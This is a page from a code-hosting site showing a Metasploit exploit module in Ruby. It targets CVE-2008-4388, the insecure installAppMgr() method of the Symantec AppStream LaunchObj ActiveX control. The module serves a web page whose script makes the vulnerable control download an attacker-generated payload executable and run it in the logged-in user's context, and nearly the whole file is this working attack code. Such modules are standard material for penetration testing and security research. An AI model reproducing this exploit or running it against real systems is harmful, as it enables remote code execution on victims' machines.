adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
0ae2e64bc56dd8543a97cc4ebc94de4738376488
metasploit-gs/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
T
URI Assassin 35d3bbf74d Fix up comment splats with the correct URI 
See the complaint on #4039. This doesn't fix that particular
issue (it's somewhat unrelated), but does solve around
a file parsing problem reported by @void-in
2014-10-17 11:47:33 -05:00

88 lines
2.4 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute',
'Description' => %q{
This module exploits a vulnerability in Symantec AppStream Client 5.x. The vulnerability
is in the LaunchObj ActiveX control (launcher.dll 5.1.0.82) containing the "installAppMgr()"
method. The insecure method can be exploited to download and execute arbitrary files in the
context of the currently logged-on user.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'References' =>
[
[ 'CVE', '2008-4388' ],
[ 'OSVDB', '51410' ],
],
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
],
'DisclosureDate' => 'Jan 15 2009',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
data = generate_payload_exe({ :code => p.encoded })
print_status("Sending payload EXE")
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end
vname = rand_text_alpha(rand(100) + 1)
exe = rand_text_alpha(rand(5) + 1 )
content = %Q|
<html>
<object id='#{vname}' classid='clsid:3356DB7C-58A7-11D4-AA5C-006097314BF8'></object>
<script language="javascript">
#{vname}.installAppMgr("#{payload_url}/#{exe}.exe");
</script>
</html>
|
print_status("Sending #{self.name}")
send_response_html(cli, content)
handler(cli)
end
end
Reference in New Issue View Git Blame Copy Permalink